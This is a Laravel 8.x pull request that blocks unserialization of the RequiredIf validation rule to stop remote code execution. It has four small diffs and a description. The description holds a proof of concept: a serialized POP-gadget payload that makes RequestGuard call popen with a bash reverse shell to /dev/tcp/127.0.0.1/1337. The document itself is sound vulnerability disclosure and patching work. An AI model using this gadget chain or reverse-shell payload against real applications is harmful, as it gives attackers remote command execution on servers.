### PR TITLE
[8.x] Unserialization is disabled to prevent Remote Code Execution

### DIFF
--- a/src/Illuminate/Validation/Rules/RequiredIf.php
+++ b/src/Illuminate/Validation/Rules/RequiredIf.php
@@ -50,6 +50,6 @@ class RequiredIf
      */
     public function __wakeup()
     {
-        throw new \BadMethodCallException('Cannot unserialize ' . __CLASS__);
+        throw new \BadMethodCallException('Cannot unserialize '.__CLASS__);
     }
 }

--- a/src/Illuminate/Validation/Rules/RequiredIf.php
+++ b/src/Illuminate/Validation/Rules/RequiredIf.php
@@ -41,7 +41,7 @@ class RequiredIf
 
         return $this->condition ? 'required' : '';
     }
-    
+
     /**
      * Unserialization is disabled to prevent Remote Code Execution in case
      * application calls unserialize() on user input containing dangerous string.

--- a/src/Illuminate/Validation/Rules/RequiredIf.php
+++ b/src/Illuminate/Validation/Rules/RequiredIf.php
@@ -41,4 +41,15 @@ class RequiredIf
 
         return $this->condition ? 'required' : '';
     }
+    
+    /**
+     * Unserialization is disabled to prevent Remote Code Execution in case
+     * application calls unserialize() on user input containing dangerous string.
+     *
+     * @return void
+     */
+    public function __wakeup()
+    {
+        throw new \BadMethodCallException('Cannot unserialize ' . __CLASS__);
+    }
 }

--- a/src/Illuminate/Validation/Rules/RequiredIf.php
+++ b/src/Illuminate/Validation/Rules/RequiredIf.php
@@ -43,8 +43,7 @@ class RequiredIf
     }
 
     /**
-     * Unserialization is disabled to prevent Remote Code Execution in case
-     * application calls unserialize() on user input containing dangerous string.
+     * Unserialization is disabled to prevent remote code execution.
      *
      * @return void
      */


### PR DESCRIPTION
Objects of the classes `Illuminate\Validation\Rules\RequiredIf` and `Illuminate\Auth\RequestGuard` can be misused to generate POP gadgets capable of Remote Code Execution.

## Proof of Concept
```php
<?php

require(__DIR__ . '/vendor/autoload.php');

$payload = 'O:38:"Illuminate\Validation\Rules\RequiredIf":1:{s:9:"condition";a:2:{i:0;O:28:"Illuminate\Auth\RequestGuard":3:{s:8:"callback";s:5:"popen";s:7:"request";s:49:"bash -c "bash -i >& /dev/tcp/127.0.0.1/1337 0>&1"";s:8:"provider";s:1:"r";}i:1;s:4:"user";}}';

echo unserialize($payload);

?>
```

## Impact
An attacker is able to execute commands remotely if an application built with Laravel is deserializing and using the string representation of user-provided serialized objects.